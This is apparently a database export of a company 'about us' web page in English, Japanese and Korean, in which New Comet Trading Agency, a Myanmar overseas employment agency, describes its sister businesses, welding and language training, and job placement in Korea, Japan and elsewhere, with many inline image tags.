('page', 0, 23, 270, 'en', 0, '<p>We, ``NEW COMET TRADING\'\' company, was established in 2004 and started operating with company registration number (295/2004-2005).</p><p>NEW COMET TRADING AGENCY Co.,Ltd (New Comet Overseas Employment Agency) licence was obtained in 2023 and since then, the company has started to carry out service activities.</p><p>We, ``NEW COMET TRADING AGENCY\'\' company, which is a brother company, such as, ZEYA NEW COMET Auto Sale &amp; Services Co.,Ltd, NEW COMET Co.,Ltd, have applied for vehicle import permits from the Ministry of Economy and Commerce, and have been working for more than 25 years in the business of buying, importing and selling various types of business trucks, tourism and transportation buses and machinery directly from Japan, and have paid the taxes set for the state. More than 100 employees were given employment opportunities.</p><p>In addition, brother companies such as NEW COMET Construction Co.,Ltd, NEW ZAYYA SHWE PYI Construction Co.,Ltd, AUNG NAY WUN Construction Co.,Ltd and other companies have also successfully won tenders from government ministries and have provided employment opportunities to more than 200 employees.</p><p>Our company \"NEW COMET TRADING AGENCY “company is currently providing welding training courses to become qualified skilled workers at the Sinmalike Shipyard for ethnic brothers from all over Myanmar who want to work in Korea\'s shipyards and connect them with job opportunities.</p><p>In addition, we are connecting job opportunities for young people who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, and Japan.</p><p>We at NEW COMET TRADING AGENCY Co.Ltd, are assisting on responsible for learning about Japan\'s developed advanced technologies, cultures and expressing their personal abilities and goals for the young generation in Myanmar.</p><p>In order to successfully pass the qualification tests (JLPT, JFT, NAT-TEST, TOP-J) required to go to Japan with a Work Visa and Training Visa, we are opening language training schools and providing teaching support.</p><p>We, \"NEW COMET TRADING AGENCY\" company, is constantly striving to provide services that produce talented skilled workers from Myanmar and send them to foreign countries.</p><img src=\"/sites/default/files/inline-images/1-NC.jpg\" data-align=\"center\" data-entity-uuid=\"1427dc29-05a8-43fe-8ca3-965d16ed0865\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-1_0.jpg\" data-align=\"center\" data-entity-uuid=\"63ac130c-f5fd-4391-982d-9cbf22c9c88b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-2.jpg\" data-align=\"center\" data-entity-uuid=\"80e04f60-8b31-432d-8034-205f1107df2f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-3.jpg\" data-align=\"center\" data-entity-uuid=\"e0e57835-6cc3-483a-895d-4d5108e80c57\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-4.jpg\" data-entity-uuid=\"9b3a507c-edd4-4ce3-b1a2-4936996fbe84\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-5.jpg\" data-align=\"center\" data-entity-uuid=\"9eac5e99-94a6-4dab-a71a-c4c7a78b8a7b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-6.jpg\" data-align=\"center\" data-entity-uuid=\"99025867-1165-45b9-987a-162bd77afc85\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-7.jpg\" data-align=\"center\" data-entity-uuid=\"ab865942-61f8-4761-ac2c-b83b675886cf\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-8.jpg\" data-align=\"center\" data-entity-uuid=\"6eb2dc0f-9c32-4d4f-bb0a-7648ab39ab11\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-9.jpg\" data-align=\"center\" data-entity-uuid=\"810afaf6-ff82-44e0-b231-927e848a41cc\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-10.jpg\" data-align=\"center\" data-entity-uuid=\"3258c9ec-64da-4a37-9e22-cff0a7b23efc\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-11.jpg\" data-align=\"center\" data-entity-uuid=\"0f435fe2-d603-4e29-b1d6-f0cc0a29d626\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-12.jpg\" data-align=\"center\" data-entity-uuid=\"a095c373-2df3-4bba-be96-e259086824d6\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-13.jpg\" data-align=\"center\" data-entity-uuid=\"aeca03e1-f9a3-4e0e-b7b6-1660dbd60c8a\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-14.jpg\" data-align=\"center\" data-entity-uuid=\"99606141-7880-4242-9f8a-39d779b7c3f4\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-15.jpg\" data-entity-uuid=\"ebdb65e0-ba0b-4289-b787-403a08a7137c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-16.jpg\" data-entity-uuid=\"89d8fc77-4e52-42ff-81bd-8cbddd3dfa5f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-17.jpg\" data-align=\"center\" data-entity-uuid=\"9f81c640-bf3c-45f2-85d1-72c351c50da7\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-18.jpg\" data-align=\"center\" data-entity-uuid=\"eaba01fe-9f4f-4c78-b4f7-f966c16106b2\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-19.jpg\" data-align=\"center\" data-entity-uuid=\"28845640-721c-4663-99e4-3fe89a3fc124\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-20.jpg\" data-align=\"center\" data-entity-uuid=\"310286d4-6f8d-425b-b758-ba0c7a46a78c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-21.jpg\" data-align=\"center\" data-entity-uuid=\"2a48e008-54b7-4ada-9bec-ec877fb83f54\" data-entity-type=\"file\"><img data-entity-uuid=\"010a0743-1136-4045-92de-ffa7bb03b84f\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-22.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-23.jpg\" data-align=\"center\" data-entity-uuid=\"61230765-b357-46fe-a38d-1699896c48d6\" data-entity-type=\"file\"><img data-entity-uuid=\"f940eee5-3ae3-4b94-9585-f317c7d9bcb8\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-24.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-25.jpg\" data-entity-uuid=\"e21d162f-6f5a-4935-bbcb-5001a8cba017\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-26.jpg\" data-align=\"center\" data-entity-uuid=\"00ae4e32-0e8a-4187-9efe-abfe0a26501b\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-27.jpg\" data-align=\"center\" data-entity-uuid=\"2989d3e0-2393-49ad-a73e-684f01edf0fa\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-28.jpg\" data-align=\"center\" data-entity-uuid=\"56339d67-286d-4418-9789-87b2f0456386\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-29.jpg\" data-align=\"center\" data-entity-uuid=\"b26a003e-c37f-4b76-bb1a-3b646ab2f771\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-30.jpg\" data-align=\"center\" data-entity-uuid=\"891213d9-115b-4b86-8d26-3ebbbbeb98a8\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-31.jpg\" data-align=\"center\" data-entity-uuid=\"95019304-f6cb-4eaa-90da-ef0d7f51ee47\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-32.jpg\" data-align=\"center\" data-entity-uuid=\"361d538d-8be6-49d8-ae4e-5ac9247fd5b9\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-33.jpg\" data-align=\"center\" data-entity-uuid=\"e46b1924-0cc4-41fc-baa4-df9dd73fbec8\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-34.jpg\" data-align=\"center\" data-entity-uuid=\"809ca92e-91d6-401f-b00b-567cc35ce1c5\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-35.jpg\" data-align=\"center\" data-entity-uuid=\"667d5781-8402-43e6-853f-ec90e796e6c7\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-36.jpg\" data-align=\"center\" data-entity-uuid=\"58b87ffa-6876-47b0-9e6e-d43d2c7aff38\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-37.jpg\" data-align=\"center\" data-entity-uuid=\"7b3b8c38-5bbf-4e74-85eb-618ca90b2db6\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-38.jpg\" data-align=\"center\" data-entity-uuid=\"d0e647b4-4413-4a58-b4cb-91c95524d97f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-39.jpg\" data-align=\"center\" data-entity-uuid=\"ad197c72-ff23-4b15-b4ad-d15c791e6a77\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-40.jpg\" data-align=\"center\" data-entity-uuid=\"894ca453-d21f-4356-ad3e-bdb7c3e12408\" data-entity-type=\"file\" alt=\"\"><img data-align=\"center\" data-entity-uuid=\"d65558d3-211e-4a10-8124-f4f01a42f4b5\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-41.jpg\">', '', 'full_html'),
('page', 0, 23, 270, 'ja', 0, '<p>当社は2004年に設立され、登録ID(295/2004-2005)を取得し、以来サービスの提供を行ってきました。そして、2023年に当社ニューコメットトレンディング海外エージェンシーを設立し、運営を開始しました。<br>当社はニュー コメット トレーディング グループの一部である。その中で最大規模のゼーヤーニューコメット自動車売買&amp;サービス株式会社は自動車の輸入許可を得て、建設現場用のトラックや、交通機関として使われるバスや様々な機械を日本から直接輸入し、販売する事業を25年間続けてきました。納税もきちんと行い、100人の従業員を雇用するまでになりました。<br>また、グループの一部であるニューコメット建築株式会社、ゼッヤシェピーティー建築株式会社、アウンネーウィン建築株式会社も政府から許可を多く受け取り、合わせて200人以上の人材紹介に成功しております。<br>現在、ニューコメットトレンディング海外エージェンシーでは、ミャンマー全国から来た民族を問わずに韓国の造船所で働きたい人たちに対して、シンマライ湾岸で経験豊富な指導者たちの下で訓練を受ける機会を提供し、仕事の紹介を行っています。<br>さらに、ドバイ、マレーシア、シンガポール、タイ、日本への就職もサポートしています。<br>ミャンマーの若者たちが自分らしさを保ちながら、自分に合った仕事を見つけ、日本の技術を学ぶことができるように支援を続けています。日本語能力試験(JLPT, JFT, NAT-TEST, TOP-J)に合格した学生に対しては、ワークビザや研修ビザを取得するための支援を提供しています。<br>我々ニューコメットトレーディング海外エージェンシーは、経験豊富で能力の高い研修生を育成し、海外の仕事チャンスを提供することに尽力して参ります。</p><img src=\"/sites/default/files/inline-images/1-NC_0.jpg\" data-align=\"center\" data-entity-uuid=\"7147154e-6c57-4d0c-99dc-5e6a1ad56cc8\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-1_1.jpg\" data-align=\"center\" data-entity-uuid=\"0a8cade2-9871-451c-a978-1d09fd84f0de\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-2_0.jpg\" data-align=\"center\" data-entity-uuid=\"1c875d61-a0c2-42a5-b28e-ff5255dd8ad3\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-3_0.jpg\" data-align=\"center\" data-entity-uuid=\"80dbdd8c-e8cd-465b-b26c-e04b67966c31\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-4_0.jpg\" data-align=\"center\" data-entity-uuid=\"d71b12e7-3d70-4a59-9715-2de3919ebc7d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-5_0.jpg\" data-align=\"center\" data-entity-uuid=\"8a845720-846c-47c3-b9e9-e1f3098f65fc\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-6_0.jpg\" data-align=\"center\" data-entity-uuid=\"b24eb73f-1d94-4450-81a5-afb6790a13f7\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-7_0.jpg\" data-align=\"center\" data-entity-uuid=\"51eb9cfb-ea78-4874-a2fb-af8d0ff97c38\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-8_0.jpg\" data-align=\"center\" data-entity-uuid=\"873929b2-4641-4686-834e-aa5ef5948b3a\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-9_0.jpg\" data-align=\"center\" data-entity-uuid=\"aa07abd4-d198-4e2c-af81-6f1eae19da17\" data-entity-type=\"file\" alt=\"\"><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/NC-10_0.jpg\" data-entity-uuid=\"41991b55-c606-4270-9a2f-eb3871ba0f31\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-11_0.jpg\" data-align=\"center\" data-entity-uuid=\"7f57bb37-0f0d-4aea-be9b-4a52fc0adf6f\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-12_0.jpg\" data-align=\"center\" data-entity-uuid=\"88251347-e029-437d-9ff8-51f406d4402c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-13_0.jpg\" data-align=\"center\" data-entity-uuid=\"b1eadb3f-c0b7-445e-aee6-f7523ba1158d\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-14_0.jpg\" data-align=\"center\" data-entity-uuid=\"676ffad7-c9a6-4d2a-9969-98e69477570c\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-15_0.jpg\" data-align=\"center\" data-entity-uuid=\"1131bddf-f0bb-4121-8c20-574a69c2e43d\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-16_0.jpg\" data-align=\"center\" data-entity-uuid=\"b0805653-8b57-493a-b7da-98b99b135795\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-17_0.jpg\" data-align=\"center\" data-entity-uuid=\"6e057327-e93f-41cc-a966-3bbfdb7046b0\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-18_0.jpg\" data-align=\"center\" data-entity-uuid=\"e2e7295f-d240-4c94-90f6-b52bc0c587bc\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-19_0.jpg\" data-align=\"center\" data-entity-uuid=\"1a08f51b-fce7-42d3-ae81-1ad523dfd3e1\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-20_0.jpg\" data-align=\"center\" data-entity-uuid=\"df97660b-54a9-403b-9796-90dcfbb580bd\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-21_0.jpg\" data-align=\"center\" data-entity-uuid=\"456bf806-4df8-483a-9bb9-78b3e285cd70\" data-entity-type=\"file\"><img data-entity-uuid=\"81098b50-a382-45b2-b96a-44bb91384739\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-22_0.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-23_0.jpg\" data-align=\"center\" data-entity-uuid=\"6c66b62a-1389-4f5c-b496-bd6f105c4259\" data-entity-type=\"file\"><img data-entity-uuid=\"f8bf2dde-b25f-46bb-bc27-d95b894955e3\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-24_0.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-25_0.jpg\" data-align=\"center\" data-entity-uuid=\"547038de-6845-4549-9311-0f02a922f630\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-26_0.jpg\" data-align=\"center\" data-entity-uuid=\"9c4a4a7d-81b0-4e33-b434-9e141438631c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-27_0.jpg\" data-align=\"center\" data-entity-uuid=\"ab06b9a1-42d7-4f07-9be5-8a825c7fca60\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-28_0.jpg\" data-align=\"center\" data-entity-uuid=\"6e769851-41be-4e61-8110-5290daf2cda3\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-29_0.jpg\" data-align=\"center\" data-entity-uuid=\"ca9cad00-b0a2-4251-9585-5c48526f9748\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-30_0.jpg\" data-align=\"center\" data-entity-uuid=\"3aae8220-86a7-4232-91d1-58e14468ec77\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-31_0.jpg\" data-align=\"center\" data-entity-uuid=\"031623ed-3c0b-4a1b-acd5-2d701d16ebac\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-32_0.jpg\" data-align=\"center\" data-entity-uuid=\"ef87488d-b6fc-43b9-a474-536a45ca31b3\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-33_0.jpg\" data-align=\"center\" data-entity-uuid=\"b6b3f255-33bb-4aa9-bf27-91cff7be1296\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-34_0.jpg\" data-align=\"center\" data-entity-uuid=\"19536b68-3af1-4ad0-9b3f-6a52f8d321d4\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-35_0.jpg\" data-align=\"center\" data-entity-uuid=\"99f5c203-f9a2-461a-8abc-2c8ba6a07f85\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-36_0.jpg\" data-align=\"center\" data-entity-uuid=\"a6cddcbb-87bf-46e9-b5f0-6eb2c81ee34a\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-37_0.jpg\" data-align=\"center\" data-entity-uuid=\"6e3b7635-3292-469e-a404-d217c165d0c8\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-38_0.jpg\" data-align=\"center\" data-entity-uuid=\"96bb0f24-5735-4d44-9780-209fc82eba38\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-39_0.jpg\" data-align=\"center\" data-entity-uuid=\"b0020490-36a6-4ed1-bde8-eecc0d0e0bc0\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-40_0.jpg\" data-align=\"center\" data-entity-uuid=\"7d4ada41-9768-43b4-83b9-469cc689b193\" data-entity-type=\"file\"><img data-align=\"center\" data-entity-uuid=\"5f5513ae-611d-4f95-aaba-1227dc176b2c\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-41_0.jpg\">', '', 'full_html'),
('page', 0, 23, 270, 'ko', 0, '<p>저희 ``New Comet Trading\'\' 회사는 2004년에 설립되어 사업자등록번호(295/2004-2005)로 영업을 시작하였습니다.<br>뉴코멧 해외직업소개회사는 2023년 외국인고용업 면허를 취득하여 서비스 활동을 시작하였습니다.</p><p><br>저희 뉴코멧 해외직업소개회사 \"New Comet Overseas Employment Agency\"는자매 회사인 &nbsp;제야뉴코멧 자동차 판매 및 서비스 회사, 뉴코멧회사등 기업들과 협력하여 경제통상자원부에서 &nbsp;차량 수입허가를 신청했고 각종 상용트럭, 관광 산업 및 운송에 사용되는 다양한 유형의 버스 및 기계를 일본에서 직접 구매 판매하는 사업을 25년 이상 &nbsp;종사해 왔고 나라를 위한 정한 세금들을 냈습니다. 게다가100 명 이상의 직원에게 고용 기회를 제공했습니다.</p><p><br>또한 쌍둥이 회사인 뉴코멧건설 회사, 제야슈웨삐띡 건설 회사, 아웅네원 회사들은 정부 부처로부터 입찰 (tender)을 받고 건설 작업을 하는 동안 200명 이상의 직원에게 고용 기회를 제공했습니다.</p><p><br>저희 \"뉴코멧 해외 직업 소개회사\"는 한국 조선소로 취업을 희망하는 미얀마 각지에서 온 소수민족 형제들을 교통통신부 산하의 씬마락 (Sinmalike) 조선소에서 유능한 트레이너들와 함께 실력있는 용접공이 되도록 수업을 제공하고 있으며 관련 기업체로 취업할 수 있게 도와주고 있습니다.또한, 두바이, 말레이시아, 싱가포르, 태국, 일본 같은 국가에서 일하기를 원하는 청년들에게 취업 기회를 받알 수 있도록 &nbsp;서비스들을 제공하고 있습니다.</p><p><br>New Comet Trading Agency Co., Ltd.는 미얀마의 젊은 치누들이 일본의 개발한 첨단 기술을 배우고 꿈을 실현할 수 있도록 필요한 교육을 제공하고 돕고 있습니다.</p><p><br>일본으로 취업비자, 연수비자로 가기 위해 필요한 자격시험(JLPT, JFT, NAT-TEST, TOP-J)에 합격할 수 있도록 어학당도 개설 및 교육을 지원하고 있습니다.</p><p><br>저희는”뉴코멧 해외직업소개회사” 는 미얀마에서 우수한 기능인력을 배출하여 해외로 파견하는 서비스를 제공하기 위해 끊임없이 노력하고 있습니다.</p><img data-align=\"center\" data-entity-uuid=\"7375e186-cf58-4d75-b92f-9eab22b78118\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/1-NC_1.jpg\"><img data-entity-uuid=\"d19e5ddf-b119-4ed3-ac45-b0803d864c96\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-1_2.jpg\" data-align=\"center\"><img data-entity-uuid=\"4dc4f426-e69c-44ec-8caf-4b1931fdf8b8\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-2_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"f854e47f-d973-4dd9-8219-826768f1adc8\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-3_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"13857fa4-2c7a-4d5b-990d-45454d4ce664\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-4_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"c4d3c7e6-c2a6-47c1-a423-afbb8fed637d\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-5_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"55284a88-e85b-4812-9ae7-807f898d55f7\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-6_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"c2b2e5f4-fb99-4766-b2fd-9b2d6e680823\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-7_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"0dfa63f3-2933-4e8b-842c-fb4562d7176d\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-8_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"16e03ce5-055f-4f8f-8be5-1f11619e8445\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-9_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"2a148620-3a3b-4fb9-8117-f6376f457d08\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-10_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"87fee7fa-f754-4ed1-8b4c-e407735f3467\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-11_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"9a88bbba-3b28-41fd-a8a8-84cca1770e30\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-12_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"cbc0b282-1b93-4f31-a52e-e00ed85f6499\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-13_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"8bba0525-3d17-4730-ac6a-43174e89662b\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-14_1.jpg\" data-align=\"center\"><img data-align=\"center\" data-entity-uuid=\"5f6a15dd-8d0a-4102-b60c-36467fd6e2a0\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-15_1.jpg\"><img data-entity-uuid=\"91065924-7e1b-40a5-a985-ab3a738841c7\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-16_1.jpg\" alt=\"\" data-align=\"center\"><img data-entity-uuid=\"cd43fa36-c108-48c2-b25d-dc1862c70dea\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-17_1.jpg\" alt=\"\" data-align=\"center\"><img data-entity-uuid=\"525a5838-a4d8-457f-97be-230841a5f654\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-18_1.jpg\" alt=\"\" data-align=\"center\"><img data-align=\"center\" data-entity-uuid=\"4b653764-4d92-4445-8e27-7614f6ef64a5\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-19_1.jpg\"><img data-align=\"center\" data-entity-uuid=\"e3ff3d3c-7c9e-462a-91f1-6c6a9aa06067\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-20_1.jpg\"><img data-entity-uuid=\"d8dbbc11-8a02-4d92-beee-82d3aba0c040\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-21_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"f184253a-5469-4443-ad8a-350db9f4c92d\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-23_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"3b495714-4bd4-411e-ae46-cc161a43ecd1\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-25_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"d495b5fa-e307-41df-b301-614c7b02a674\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-26_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"ad5dc94c-17ae-411f-99e9-6d1b74a22e99\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-27_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"c3de86e8-0aee-413b-b2d5-5ba6506e8954\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-28_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"7535e5c5-67cc-42fe-a4b1-8360b4e324d5\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-29_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"f42194d2-173d-4d4b-ac0c-284914e1cb87\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-30_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"f127d213-3626-4b42-bc37-8092a71b102e\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-31_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"71bc98fd-06ba-41c0-bcf6-b00ac31d60c2\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-32_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"e2aa83c9-dcae-4217-b822-f3873b24be0e\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-33_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"97341ea9-c3d9-4a97-b53e-fcd700908167\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-34_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"3d0fcd94-7f1e-4ab3-b585-7de2b6abb4a2\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-35_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"0fcd4e94-95d7-4068-bb81-324b11b42f0b\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-36_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"0619bbdf-c510-43bc-9e9b-533659637d64\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-37_1.jpg\" data-align=\"center\"><img data-align=\"center\" data-entity-uuid=\"ff1153a3-aa9c-4673-bf92-21b3b0b9331d\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-38_1.jpg\"><img data-entity-uuid=\"0170f578-5243-4700-a630-995e3e009f65\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-39_2.jpg\" data-align=\"center\"><img data-align=\"center\" data-entity-uuid=\"1d69982c-23e7-4c63-b748-667e38a06b7f\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-40_1.jpg\">', '', 'full_html'),
('page', 0, 23, 271, 'en', 0, '<p>We, ``NEW COMET TRADING\'\' company, was established in 2004 and started operating with company registration number (295/2004-2005).</p><p>NEW COMET TRADING AGENCY Co.,Ltd (New Comet Overseas Employment Agency) licence was obtained in 2023 and since then, the company has started to carry out service activities.</p><p>We, ``NEW COMET TRADING AGENCY\'\' company, which is a brother company, such as, ZEYA NEW COMET Auto Sale &amp; Services Co.,Ltd, NEW COMET Co.,Ltd, have applied for vehicle import permits from the Ministry of Economy and Commerce, and have been working for more than 25 years in the business of buying, importing and selling various types of business trucks, tourism and transportation buses and machinery directly from Japan, and have paid the taxes set for the state. More than 100 employees were given employment opportunities.</p><p>In addition, brother companies such as NEW COMET Construction Co.,Ltd, NEW ZAYYA SHWE PYI Construction Co.,Ltd, AUNG NAY WUN Construction Co.,Ltd and other companies have also successfully won tenders from government ministries and have provided employment opportunities to more than 200 employees.</p><p>Our company \"NEW COMET TRADING AGENCY “company is currently providing welding training courses to become qualified skilled workers at the Sinmalike Shipyard for ethnic brothers from all over Myanmar who want to work in Korea\'s shipyards and connect them with job opportunities.</p><p>In addition, we are connecting job opportunities for young people who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, and Japan.</p><p>We at NEW COMET TRADING AGENCY Co.Ltd, are assisting on responsible for learning about Japan\'s developed advanced technologies, cultures and expressing their personal abilities and goals for the young generation in Myanmar.</p><p>In order to successfully pass the qualification tests (JLPT, JFT, NAT-TEST, TOP-J) required to go to Japan with a Work Visa and Training Visa, we are opening language training schools and providing teaching support.</p><p>We, \"NEW COMET TRADING AGENCY\" company, is constantly striving to provide services that produce talented skilled workers from Myanmar and send them to foreign countries.</p><img src=\"/sites/default/files/inline-images/1-NC.jpg\" data-align=\"center\" data-entity-uuid=\"1427dc29-05a8-43fe-8ca3-965d16ed0865\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-1_0.jpg\" 